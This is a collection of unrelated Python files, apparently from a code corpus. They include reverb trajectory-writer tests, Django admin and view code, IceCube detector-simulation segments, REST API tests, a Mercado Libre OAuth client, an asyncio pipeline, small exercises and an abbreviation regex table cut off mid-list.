@parameterized.parameters(
(1, None, True),
(0, None, False),
(-1, None, False),
(1, 1, True),
(1, 0, False),
(1, -1, False),
(5, 5, True),
(4, 5, False),
)
def test_configure_validates_params(self, num_keep_alive_refs: int,
max_chunk_length: Optional[int],
valid: bool):
if valid:
self.writer.configure(('a',),
num_keep_alive_refs=num_keep_alive_refs,
max_chunk_length=max_chunk_length)
else:
with self.assertRaises(ValueError):
self.writer.configure(('a',),
num_keep_alive_refs=num_keep_alive_refs,
max_chunk_length=max_chunk_length)
def test_episode_steps(self):
for _ in range(10):
# Every episode, including the first, should start at zero.
self.assertEqual(self.writer.episode_steps, 0)
for i in range(1, 21):
self.writer.append({'x': 3, 'y': 2})
# Step count should increment with each append call.
self.assertEqual(self.writer.episode_steps, i)
# Ending the episode should reset the step count to zero.
self.writer.end_episode()
def test_episode_steps_partial_step(self):
for _ in range(3):
# Every episode, including the first, should start at zero.
self.assertEqual(self.writer.episode_steps, 0)
for i in range(1, 4):
self.writer.append({'x': 3}, partial_step=True)
# Step count should not increment on partial append calls.
self.assertEqual(self.writer.episode_steps, i - 1)
self.writer.append({'y': 2})
# Step count should increment after the unqualified append call.
self.assertEqual(self.writer.episode_steps, i)
# Ending the episode should reset the step count to zero.
self.writer.end_episode()
class TrajectoryColumnTest(parameterized.TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._server = server_lib.Server([server_lib.Table.queue('queue', 100)])
def setUp(self):
super().setUp()
self.client = client_lib.Client(f'localhost:{self._server.port}')
@classmethod
def tearDownClass(cls):
super().tearDownClass()
cls._server.stop()
def test_numpy(self):
writer = self.client.trajectory_writer(num_keep_alive_refs=10)
for i in range(10):
      writer.append({'a': i, 'b': np.ones([3, 3], np.float64) * i})
np.testing.assert_array_equal(writer.history['a'][:].numpy(),
np.arange(i + 1, dtype=np.int64))
np.testing.assert_array_equal(
writer.history['b'][:].numpy(),
          np.stack([np.ones([3, 3], np.float64) * x for x in range(i + 1)]))
def test_numpy_squeeze(self):
writer = self.client.trajectory_writer(num_keep_alive_refs=10)
for i in range(10):
writer.append({'a': i})
self.assertEqual(writer.history['a'][-1].numpy(), i)
def test_validates_squeeze(self):
# Exactly one is valid.
trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)], squeeze=True)
# Zero is not fine.
with self.assertRaises(ValueError):
trajectory_writer.TrajectoryColumn([], squeeze=True)
# Neither is two (or more).
with self.assertRaises(ValueError):
trajectory_writer.TrajectoryColumn(
[FakeWeakCellRef(1), FakeWeakCellRef(2)], squeeze=True)
def test_len(self):
for i in range(1, 10):
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)] * i)
self.assertLen(column, i)
def test_none_raises(self):
with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
trajectory_writer.TrajectoryColumn([None])
with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1), None])
@parameterized.named_parameters(
('int', 0),
('float', 1.0),
('bool', True),
('np ()', np.empty(())),
('np (1)', np.empty((1))),
('np (1, 1)', np.empty((1, 1))),
('np (3, 4, 2)', np.empty((3, 4, 2))),
)
def test_shape(self, data):
expected_shape = np.asarray(data).shape
for i in range(1, 10):
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)] * i)
self.assertEqual(column.shape, (i, *expected_shape))
def test_shape_squeezed(self):
expected_shape = (2, 5)
data = np.arange(10).reshape(*expected_shape)
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)],
squeeze=True)
self.assertEqual(column.shape, expected_shape)
@parameterized.named_parameters(
('int', 0),
('float', 1.0),
('bool', True),
('np_float16', np.empty(shape=(), dtype=np.float16)),
('np_float32', np.empty(shape=(), dtype=np.float32)),
('np_float64', np.empty(shape=(), dtype=np.float64)),
('np_int8', np.empty(shape=(), dtype=np.int8)),
('np_int16', np.empty(shape=(), dtype=np.int16)),
('np_int32', np.empty(shape=(), dtype=np.int32)),
('np_int64', np.empty(shape=(), dtype=np.int64)),
('np_uint8', np.empty(shape=(), dtype=np.uint8)),
('np_uint16', np.empty(shape=(), dtype=np.uint16)),
('np_uint32', np.empty(shape=(), dtype=np.uint32)),
('np_uint64', np.empty(shape=(), dtype=np.uint64)),
('np_complex64', np.empty(shape=(), dtype=np.complex64)),
('np_complex128', np.empty(shape=(), dtype=np.complex128)),
      ('np_bool', np.empty(shape=(), dtype=bool)),
      ('np_object', np.empty(shape=(), dtype=object)),
)
def test_dtype(self, data):
expected_dtype = np.asarray(data).dtype
column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)])
self.assertEqual(column.dtype, expected_dtype)
if __name__ == '__main__':
absltest.main()
|
python
|
from django.contrib import admin
from activities.models import *
# Register your models here.
admin.site.register(Activity)
|
python
|
from django.contrib import admin
from .models import GoogleAuthUser
class GoogleAuthUserOption(admin.ModelAdmin):
"""GoogleAuthUser options"""
list_display = ('user', 'refresh_token')
search_fields = ('user',)
admin.site.register(GoogleAuthUser, GoogleAuthUserOption)
|
python
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Translate a glob-style pattern to a regular expression.
"""
__version__ = "$Id$"
#end_pymotw_header
import fnmatch
pattern = 'fnmatch_*.py'
print 'Pattern :', pattern
print 'Regex :', fnmatch.translate(pattern)
|
python
|
#!/usr/bin/env python
from icecube import icetray, dataclasses
def ConvertToLinearizedMCTree(frame):
if 'I3MCTree' in frame:
try:
tree = dataclasses.I3LinearizedMCTree(frame['I3MCTree'])
except:
            icetray.logging.log_error('cannot convert to I3LinearizedMCTree')
else:
del frame['I3MCTree']
frame['I3MCTree'] = tree
return True
@icetray.traysegment
def DetectorSim(tray, name,
RandomService = None,
RunID = None,
GCDFile = None,
KeepMCHits = False,
KeepPropagatedMCTree = False,
KeepMCPulses = False,
SkipNoiseGenerator = False,
LowMem = False,
InputPESeriesMapName = "I3MCPESeriesMap",
BeaconLaunches = True,
TimeShiftSkipKeys=[],
FilterTrigger=True):
"""
    Read photon-propagated (MCPE) files, simulate noise, PMT response, DOMLaunches, and the trigger.
    :param RandomService: the name of a random service to be used by the tank response
    :param RunID: number of the run that will be written to I3EventHeader
    :param GCDFile: path to GCD file to read first
    :param KeepMCHits: keep MCPEs in frame
    :param KeepPropagatedMCTree: keep MCTree with all in-ice propagated secondaries. These take a lot of space compared to the unpropagated tree.
    :param KeepMCPulses: keep I3MCPulseSeriesMap in frame.
    :param SkipNoiseGenerator: do not run Vuvuzela.
    :param LowMem: reduce peak memory use by repeatedly merging hits as they are generated. WARNING: Use of this option may slightly reduce precision and drastically increase running time. It is potentially useful for very bright events, and probably harmful for very long events.
    :param InputPESeriesMapName: name of input I3MCPESeriesMap object.
    :param BeaconLaunches: add beacon launches.
    :param TimeShiftSkipKeys: list of keys that should not be time-shifted. Default: shift all Time-like objects.
    :param FilterTrigger: remove events that don't pass any trigger.
"""
from icecube import icetray, dataclasses, dataio, phys_services
from icecube import trigger_sim
from I3Tray import I3Units
from icecube import DOMLauncher
from icecube import topsimulator
if RunID is None:
icetray.logging.log_fatal("You *must* set a RunID in production.")
if not RandomService:
icetray.logging.log_fatal("You *must* set a RandomService name.")
MCPESeriesMapNames = [
InputPESeriesMapName,
"BackgroundI3MCPESeriesMap",
"SignalI3MCPEs"
]
MCPulseSeriesMapNames = [
"I3MCPulseSeriesMap",
"I3MCPulseSeriesMapParticleIDMap"
]
MCTreeNames = [
"I3MCTree",
"BackgroundI3MCTree",
"SignalMCTree"
]
MCPMTResponseMapNames = []
if not SkipNoiseGenerator:
InputPESeriesMapName_withoutNoise = InputPESeriesMapName + "WithoutNoise"
tray.Add("Rename", "RenamePESeriesMap",
Keys=[InputPESeriesMapName, InputPESeriesMapName_withoutNoise])
MCPESeriesMapNames.append(InputPESeriesMapName_withoutNoise)
from icecube import vuvuzela
tray.AddSegment(vuvuzela.AddNoise, name+"_vuvuzela",
OutputName = InputPESeriesMapName,
InputName = InputPESeriesMapName_withoutNoise,
StartTime = -10.*I3Units.microsecond,
EndTime = 10.*I3Units.microsecond,
RandomServiceName = RandomService,
)
tray.AddSegment(DOMLauncher.DetectorResponse, "DetectorResponse",
pmt_config = {'Input':InputPESeriesMapName,
'Output':"I3MCPulseSeriesMap",
'MergeHits':True,
'LowMem':LowMem,
'RandomServiceName' : RandomService},
dom_config = {'Input':'I3MCPulseSeriesMap',
'Output':"I3DOMLaunchSeriesMap",
'UseTabulatedPT':True,
'RandomServiceName' : RandomService,
'BeaconLaunches':BeaconLaunches})
timeshiftargs={'SkipKeys':TimeShiftSkipKeys}
tray.AddSegment(trigger_sim.TriggerSim,
name+'_triggersim',
gcd_file=dataio.I3File(GCDFile), # for trigger auto-configuration
run_id = RunID,
prune = True,
time_shift = True,
time_shift_args = timeshiftargs,
filter_mode = FilterTrigger
)
tray.AddModule('I3PrimaryPulseMapper', 'MapPrimariesToPulses')
tray.AddModule('I3TopAddComponentWaveforms', 'AddComponentWaveforms',
PESeriesMap='I3MCPESeriesMap',
Waveforms="")
tray.AddModule("Delete", name+"_cleanup",
Keys = ["MCTimeIncEventID",
"MCPMTResponseMap",
])
if not KeepMCPulses:
tray.AddModule("Delete", name+"_cleanup_2",
Keys = MCPulseSeriesMapNames + MCPMTResponseMapNames)
if not KeepMCHits:
tray.AddModule("Delete", name+"_cleanup_I3MCHits_2",
Keys = MCPESeriesMapNames)
if not KeepPropagatedMCTree: # Always keep original tree
tray.AddModule("Delete", name+"_cleanup_I3MCTree_3",
Keys = MCTreeNames)
@icetray.traysegment
def DetectorSegment(tray,name,If=lambda f:True,
gcdfile='',
mctype='corsika_weighted',
MCPESeriesMapName='I3MCPESeriesMap',
detector_label='IC86:2012',
runtrigger=True,
filtertrigger=True,
stats={},
basicHisto=False,
icetop=False,
genie=False,
prescale=1,
uselineartree=True,
lowmem=False,
BeaconLaunches=True,
TimeShiftSkipKeys=[],
GeneratedEfficiency=0.0,
SampleEfficiency=0.0,
RunID=None,
KeepMCHits = False,
KeepPropagatedMCTree = False,
KeepMCPulses = False,
):
"""
Run IC86 detector simulation
"""
from .. import segments
# Combine MCPEs from both detectors
if genie:
tray.Add("Rename", Keys=[MCPESeriesMapName, 'GenieMCPEs'])
tray.Add("I3CombineMCPE",
InputResponses = ["GenieMCPEs", "BackgroundMCPEs"],
OutputResponse = MCPESeriesMapName)
tray.Add("Delete", Keys=['BackgroundMCPEs','GenieMCPEs'])
if icetop:
tray.Add("Rename", Keys=[MCPESeriesMapName, 'InIceMCPEs'])
tray.Add("I3CombineMCPE",
InputResponses = ["IceTopMCPEs", "InIceMCPEs"],
OutputResponse = MCPESeriesMapName)
tray.Add("Delete", Keys=['InIceMCPEs', 'IceTopMCPEs'])
# Sample a different efficiency
if SampleEfficiency > 0.0:
if SampleEfficiency > GeneratedEfficiency:
            icetray.logging.log_fatal(
                'Cannot upscale from GeneratedEfficiency %s to SampleEfficiency %s' % (
                    GeneratedEfficiency, SampleEfficiency))
tray.AddSegment(segments.MultiDomEffSample,"resample",
GeneratedEfficiency=GeneratedEfficiency,
SampleEfficiencies=[SampleEfficiency],
InputSeriesName=MCPESeriesMapName,
DeleteOriginalSeries=True,
OverwriteOriginalSeries=True,
)
tray.AddSegment(DetectorSim, "DetectorSim",
RandomService = 'I3RandomService',
GCDFile = gcdfile,
InputPESeriesMapName = MCPESeriesMapName,
KeepMCHits = KeepMCHits,
KeepMCPulses = KeepMCPulses,
KeepPropagatedMCTree = KeepPropagatedMCTree,
LowMem = lowmem,
BeaconLaunches=BeaconLaunches,
SkipNoiseGenerator = False,
TimeShiftSkipKeys = TimeShiftSkipKeys,
FilterTrigger=filtertrigger,
RunID=RunID)
from ..util import BasicCounter, DAQCounter
tray.AddModule(BasicCounter,"count_triggers",
Streams = [icetray.I3Frame.DAQ] ,
name="%s Triggered Events" % detector_label,
Stats=stats)
skipkeys = [ "I3Triggers", "EnhancementFactor", "MCPMTResponseMap", "MCTimeIncEventID"]
skipkeys += ["IceTopRawData_unused","MCPMTResponseMap","MCTopHitSeriesMap"]
if "NKGInfo" in skipkeys: # Keep NKGInfo for IceTop
skipkeys.remove("NKGInfo")
if uselineartree:
tray.AddModule(ConvertToLinearizedMCTree,"lineartree",streams=[icetray.I3Frame.DAQ])
|
python
|
import json
from unittest import mock
from routemaster.db import Label, History
def test_root(client, version):
response = client.get('/')
assert response.json == {
'status': 'ok',
'state-machines': '/state-machines',
'version': version,
}
def test_root_error_state(client, version):
with mock.patch(
'sqlalchemy.orm.query.Query.one',
side_effect=RuntimeError,
):
response = client.get('/')
assert response.status_code == 503
assert response.json == {
'status': 'error',
'message': 'Cannot connect to database',
'version': version,
}
def test_enumerate_state_machines(client, app):
response = client.get('/state-machines')
assert response.status_code == 200
assert response.json == {'state-machines': [
{
'name': state_machine.name,
'labels': f'/state-machines/{state_machine.name}/labels',
}
for state_machine in app.config.state_machines.values()
]}
def test_create_label(client, app, mock_test_feed):
label_name = 'foo'
state_machine = app.config.state_machines['test_machine']
label_metadata = {'bar': 'baz'}
with mock_test_feed():
response = client.post(
f'/state-machines/{state_machine.name}/labels/{label_name}',
data=json.dumps({'metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 201
assert response.json['metadata'] == {'bar': 'baz'}
with app.new_session():
label = app.session.query(Label).one()
assert label.name == label_name
assert label.state_machine == state_machine.name
assert label.metadata == label_metadata
history = app.session.query(History).one()
assert history.label_name == label_name
assert history.old_state is None
assert history.new_state == state_machine.states[0].name
def test_create_label_404_for_not_found_state_machine(client):
response = client.post(
'/state-machines/nonexistent_machine/labels/foo',
data=json.dumps({'metadata': {'bar': 'baz'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_create_label_400_for_invalid_body(client):
response = client.post(
'/state-machines/test_machine/labels/foo',
data='not valid json',
content_type='application/json',
)
assert response.status_code == 400
def test_create_label_400_for_missing_metadata_key(client):
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({}),
content_type='application/json',
)
assert response.status_code == 400
def test_create_label_409_for_already_existing_label(client, create_label):
create_label('foo', 'test_machine', {})
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {}}),
content_type='application/json',
)
assert response.status_code == 409
def test_update_label(client, app, create_label, mock_webhook, mock_test_feed):
create_label('foo', 'test_machine', {})
label_metadata = {'bar': 'baz'}
with mock_webhook(), mock_test_feed():
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 200
assert response.json['metadata'] == label_metadata
with app.new_session():
label = app.session.query(Label).one()
assert label.metadata == label_metadata
def test_update_label_404_for_not_found_label(client):
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_update_label_404_for_not_found_state_machine(client):
response = client.patch(
'/state-machines/nonexistent_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 404
def test_update_label_400_for_invalid_body(client, create_label):
create_label('foo', 'test_machine', {})
response = client.patch(
'/state-machines/test_machine/labels/foo',
data='not valid json',
content_type='application/json',
)
assert response.status_code == 400
def test_update_label_400_for_no_metadata(client, app, create_label):
create_label('foo', 'test_machine', {})
label_metadata = {'bar': 'baz'}
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'not_metadata': label_metadata}),
content_type='application/json',
)
assert response.status_code == 400
def test_get_label(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 200
assert response.json['metadata'] == {'bar': 'baz'}
def test_get_label_has_state(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 200
assert response.json['state'] == 'start'
def test_get_label_404_for_not_found_label(client, create_label):
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 404
def test_get_label_404_for_not_found_state_machine(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/nonexistent_machine/labels/foo')
assert response.status_code == 404
def test_list_labels_404_for_not_found_state_machine(client, create_label):
response = client.get('/state-machines/nonexistent_machine/labels')
assert response.status_code == 404
def test_list_labels_when_none(client, create_label):
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == []
def test_list_labels_includes_link_to_create_labels(client, create_label):
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert (
response.json['create'] ==
'/state-machines/test_machine/labels/:name'
)
def test_list_labels_when_one(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == [{'name': 'foo'}]
def test_list_labels_when_many(client, create_label):
create_label('foo', 'test_machine', {'bar': 'baz'})
create_label('quox', 'test_machine', {'spam': 'ham'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
# Always returned in alphabetical order
assert response.json['labels'] == [{'name': 'foo'}, {'name': 'quox'}]
def test_update_label_moves_label(client, create_label, app, mock_webhook, mock_test_feed, current_state):
label = create_label('foo', 'test_machine', {})
with mock_webhook() as webhook, mock_test_feed():
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'should_progress': True}}),
content_type='application/json',
)
webhook.assert_called_once()
assert response.status_code == 200
assert response.json['metadata'] == {'should_progress': True}
assert current_state(label) == 'end'
def test_delete_existing_label(client, app, create_label):
label_name = 'foo'
state_machine = app.config.state_machines['test_machine']
create_label(label_name, state_machine.name, {'bar': 'baz'})
response = client.delete(
f'/state-machines/{state_machine.name}/labels/{label_name}',
content_type='application/json',
)
assert response.status_code == 204
with app.new_session():
label = app.session.query(Label).one()
assert label.name == label_name
assert label.state_machine == state_machine.name
assert label.metadata == {}
history = app.session.query(History).order_by(
History.id.desc(),
).first()
assert history is not None
assert history.label_name == label_name
assert history.old_state == state_machine.states[0].name
assert history.new_state is None
def test_delete_non_existent_label(client, app):
# When deleting a non-existent label, we do nothing.
response = client.delete(
f'/state-machines/test_machine/labels/foo',
content_type='application/json',
)
assert response.status_code == 204
with app.new_session():
assert app.session.query(Label).count() == 0
assert app.session.query(History).count() == 0
def test_delete_label_404_for_not_found_state_machine(client):
response = client.delete(
'/state-machines/nonexistent_machine/labels/foo',
content_type='application/json',
)
assert response.status_code == 404
def test_list_labels_excludes_deleted_labels(
client,
create_label,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
create_label('quox', 'test_machine', {'spam': 'ham'})
response = client.get('/state-machines/test_machine/labels')
assert response.status_code == 200
assert response.json['labels'] == [{'name': 'quox'}]
def test_get_label_410_for_deleted_label(
client,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
response = client.get('/state-machines/test_machine/labels/foo')
assert response.status_code == 410
def test_create_label_409_for_deleted_label(client, create_label):
create_label('foo', 'test_machine', {})
response = client.post(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {}}),
content_type='application/json',
)
assert response.status_code == 409
def test_update_label_410_for_deleted_label(
client,
create_deleted_label,
app,
):
create_deleted_label('foo', 'test_machine')
response = client.patch(
'/state-machines/test_machine/labels/foo',
data=json.dumps({'metadata': {'foo': 'bar'}}),
content_type='application/json',
)
assert response.status_code == 410
|
python
|
"""A `WorkItem` carries information about potential and completed work in the
Cosmic Ray system.
`WorkItem` is one of the central structures in CR. It can describe both work
to be done and work that has been done, and it indicates how test sessions have
completed.
"""
def make_record(name, fields=(), docstring=""):
"""Create a new record class.
A Record is fundamentally a dict with a specified set of keys. These keys
will always have a value (defaulting to None), they can't be removed, and
new keys can not be added.
This may sound a lot like a class, and that's true. The main benefit of
records is that they can be treated directly like dicts for the most part,
and, critically, they are easy to JSON-ify. Also, like classes, they ensure
that they're only used in the correct way, i.e. users can only access the
specified fields. This prevents the confusion of using simple dicts where
people can use conflicting or confusing key names.
Args:
name: The name of the class to be created.
fields: The names of the fields in the record.
docstring: The docstring for the record class.
Returns: A new class derived from dict with the specified fields.
"""
def __init__(self, vals=None, **kwargs):
dict.__init__(self, dict.fromkeys(fields))
values = vals or dict()
kwargs.update(values)
for key, value in kwargs.items():
self[key] = value
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError('no attribute {}'.format(name))
def __setattr__(self, name, value):
try:
self[name] = value
except KeyError:
raise AttributeError('no attribute {}'.format(name))
def __getitem__(self, name):
if name not in self:
raise KeyError('no field {} in record'.format(name))
return dict.__getitem__(self, name)
def __setitem__(self, name, value):
if name not in self:
raise KeyError('no field {} in record'.format(name))
dict.__setitem__(self, name, value)
def __delitem__(self, name): # pylint: disable=unused-argument
msg = 'record does not support deleting fields: {}'.format(name)
raise KeyError(msg)
def update(self, container):
"""Add all key-value pairs from `container` into this record.
If there are duplicate keys, those in `container` will overwrite those
here.
"""
for key, values in container.items():
self[key] = values
attrs = {
'__init__': __init__,
'__getattr__': __getattr__,
'__setattr__': __setattr__,
'__getitem__': __getitem__,
'__setitem__': __setitem__,
'__delitem__': __delitem__,
'update': update
}
rec = type(name, (dict,), attrs)
rec.__doc__ = docstring
return rec
WorkItem = make_record( # pylint: disable=invalid-name
'WorkItem',
[
# Arbitrary data returned by the concrete TestRunner to provide more
# information about the test results.
'data',
# A test_runner.TestOutcome from the test run.
'test_outcome',
# A worker.WorkOutcome describing how the worker completed.
'worker_outcome',
# The diff produced by the operators
'diff',
# the module to be mutated
'module',
        # The name of the operator that was applied.
        'operator',
# The occurrence on which the operator was applied.
'occurrence',
# The line number at which the operator was applied.
'line_number',
'command_line',
'job_id'
],
docstring=" The details of a specific mutation and test run in CosmicRay."
)
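# Minimal usage sketch (added for illustration, not part of the original
# module): records behave like dicts with a fixed key set, so they are easy
# to JSON-ify and they reject unknown fields.
if __name__ == '__main__':
    import json
    Point = make_record('Point', ['x', 'y'], docstring="A 2D point record.")
    p = Point(x=1)
    p.y = 2                       # attribute and item access are equivalent
    assert p['x'] == 1 and p.y == 2
    print(json.dumps(p))          # {"x": 1, "y": 2}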
|
python
|
import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist
(x_train, t_train), (x_test, t_test) = \
load_mnist(normalize=True, one_hot_label=True)
train_size = x_train.shape[0]
batch_size = 10
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
def cross_entropy_error(y, t):
    if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)
    batch_size = y.shape[0]
    # t is one-hot encoded (one_hot_label=True above), so sum t * log(y) directly;
    # the small constant guards against log(0).
    return -np.sum(t * np.log(y + 1e-7)) / batch_size
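# Quick sanity check (added for illustration, not in the original script): a
# softmax-like prediction that puts most of its mass on the correct class
# should give a small loss.
y_example = np.array([0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0])
t_example = np.array([0, 0, 1, 0, 0, 0, 0, 0, 0, 0])  # one-hot label for class 2
print(cross_entropy_error(y_example, t_example))       # about 0.51, i.e. -log(0.6)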
|
python
|
import requests
from src.mercadolibre.OAuth import OAuth
from src.mercadolibre.enums import paths
from src.mercadolibre.enums.HttpMethods import HttpMethods
class Client:
def __init__(self, access_token=None, refresh_token=None):
self.access_token = access_token
self.refresh_token = refresh_token
self.method = HttpMethods.GET
self.url = ''
self.headers = None
self.query_params = None
self.request_params = None
self.is_search = False
self.object_name = None
        self.response_data_list = []
        self.data = None
def request(self, method=HttpMethods.GET, path=None, query_params=None, data=None):
self.method = method
self.url = f'{paths.BASE_URL}{path}'
self.query_params = query_params
self.data = data
response = self.__submit_request()
error = None
tokens = None
if not isinstance(response.json(), list):
error = response.json().get('error')
if (error == 'invalid_grant' or error == 'not_found') and self.access_token:
tokens = self.__refresh_token()
response = self.__submit_request()
return response, tokens
def __submit_request(self):
self.__set_headers()
response = requests.request(method=self.method, url=self.url, headers=self.headers, params=self.query_params,
json=self.data)
return response
def __set_headers(self):
if self.access_token:
self.headers = {'Authorization': f'Bearer {self.access_token}'}
def __refresh_token(self):
response = OAuth().refresh_token(refresh_token=self.refresh_token)
response_json = response.json()
self.access_token = response_json.get('access_token')
return {'access_token': self.access_token,
'refresh_token': response_json.get('refresh_token')}
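# Illustrative sketch only (not part of the original module): how a caller
# might use Client. The path, tokens and response shape are placeholders and
# depend on paths.BASE_URL and the Mercado Libre API itself.
if __name__ == '__main__':
    client = Client(access_token='APP_USR-xxxx', refresh_token='TG-xxxx')
    response, tokens = client.request(
        method=HttpMethods.GET,
        path='/users/me',
        query_params=None,
    )
    print(response.status_code)
    if tokens:
        # the access token was refreshed during the call; persist the new pair
        print(tokens['access_token'])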
|
python
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib import messages
# Create your views here.
def register(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            messages.success(request, f'Account created for {username}!')
            return redirect('blog-home')
else:
form = UserCreationForm()
return render(request,'users/register.html',{'form':form})
|
python
|
""""""
__all__ = ['Pipeline']
# Standard library modules.
import asyncio
# Third party modules.
from loguru import logger
import tqdm
# Local modules.
# Globals and constants variables.
class Pipeline:
def __init__(self, tasks, stop_on_failure=False):
self.tasks = tuple(tasks)
self.stop_on_failure = stop_on_failure
async def run(self, progress=True):
"""
Runs the *inputdata* through the pipeline.
"""
success_tasks = []
it = enumerate(self.tasks)
if progress:
it = tqdm.tqdm(it, total=len(self.tasks))
for i, task in it:
task_name = task.name
if progress:
it.set_description(task_name)
logger.debug('Running task #{}: {}', i, task_name)
# Run task.
try:
success = await task.run(progress=progress)
            except Exception:
logger.exception('Task #{} failed: {}', i, task_name)
success = False
if self.stop_on_failure:
raise
if success:
success_tasks.append(task)
logger.debug('Task #{} succeeded: {}', i, task_name)
else:
logger.debug('Task #{} skipped: {}', i, task_name)
return success_tasks
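# Usage sketch (added for illustration, not part of the original module): any
# object with a `name` attribute and an async `run(progress=...)` coroutine
# can act as a task here.
if __name__ == '__main__':
    class EchoTask:
        def __init__(self, name, succeed=True):
            self.name = name
            self._succeed = succeed

        async def run(self, progress=True):
            await asyncio.sleep(0)   # stand-in for real async work
            return self._succeed

    pipeline = Pipeline([EchoTask('first'), EchoTask('second', succeed=False)])
    done = asyncio.run(pipeline.run(progress=False))
    print([task.name for task in done])   # only the successful task remains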
|
python
|
from typing import List


class Solution:
    def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:
        # The skyline from left/right is the max of each row; from top/bottom,
        # the max of each column. Each building can grow to the smaller of the two.
        row_max = [max(row) for row in grid]
        col_max = [max(col) for col in zip(*grid)]
        return sum(min(row_max[i], col_max[j]) - cell
                   for i, row in enumerate(grid)
                   for j, cell in enumerate(row))
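# Small demo (added for illustration): the classic example grid for this
# problem; the expected answer is 35.
if __name__ == '__main__':
    demo_grid = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]
    print(Solution().maxIncreaseKeepingSkyline(demo_grid))  # 35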
|
python
|
#!/usr/bin/env python
#
import os, unittest
here = os.path.abspath(os.path.dirname(__file__))
class TestCase(unittest.TestCase):
def test(self):
"neutron_storage: no neutron saved"
workdir = 'NeutronStorage-zero-neutrons'
saved = os.path.abspath('.')
        os.chdir(workdir)
        try:
            if os.system('bash test.sh'):
                raise RuntimeError("Failed")
        finally:
            # restore the working directory saved above so later tests are unaffected
            os.chdir(saved)
        return
pass # end of TestCase
if __name__ == "__main__": unittest.main()
# End of file
|
python
|
import re
#source: https://en.wiktionary.org/wiki/Category:English_abbreviations
ABBREVIATIONS_COMMON = [(re.compile(r'\b%s\.?(,?)\b' % x[0]), r'%s\1 ' % x[1]) for x in [
("abbr", "abbreviation"),
("abbrev", "abbreviation"),
#("abr", "abridged"),
("abstr", "abstract"),
("AI", "artificial intelligence"),
#("Amer", "american"),
#("am", "ante meridiem"),
#("AM", "ante meridiem"),
("approx", "approximately"),
("[Aa]pr", "april"),
("[Aa]pt", "apartment"),
("[Aa]pts", "apartments"),
("appt", "appointment"),
("[Aa]ssoc", "association"),
("[Aa]sst", "assistant"),
#("[Aa]ug", "august"),
#("auth", "authority"),
("[Aa]v", "avenue"),
("ave", "average"),
("[Bb]lvd", "boulevard"),
("ca", "circa"),
("Capt", "captain"),
("cert", "certified"),
("cllr", "councillor"),
("co", "company"),
("c\/o", "care of"),
("\.com", " dot com"),
("colloq", "colloquial"),
("Comdr", "commander"),
("cont\'d", "continued"),
("Corp", "corporation"),
("Ctrl", "control"),
("Dr", "doctor"),
("dr", "drive"),
#("[Dd]ec", "december"),
("[Dd]ept", "department"),
("[Dd]istrib", "distributor"),
("[Ee]d", "edition"),
("est", "established"),
("etc", "etcetra"),
("[Ee]xec", "executive"),
#("[Ff]eb", "february"),
("[Ff]wd", "forward"),
("[Gg]ov", "government"),
("[Gg]ov\'t", "government"),
("GMT", "greenwich mean time"),
("Hebr", "hebrew"),
("[Hh]on\'ble", "honorable"),
("Hon", "honorable"),
("i\.e", "that is"),
("illust?", "illustration"),
("[Ii]ntro", "introduction"),
("[Ii]nc", "incorporated"),
#("[Jj]an", "january"),
("[Jj]our", "journal"),
("Jr", "junior"),
("[Ll]n", "lane"),
("Lieut", "lieutenant"),
("[Ll]td", "limited"),
("Maj", "major"),
("mfg", "manufacturing"),
("[Mm]gmt", "management"),
("min", "minute"),
("misc", "miscellaneous"),
("mktg", "marketing"),
("Mr", "mister"),
("Mrs", "missus"),
("Ms", "miss"),
("Mme", "madame"),
("n\.b", "nota bene"),
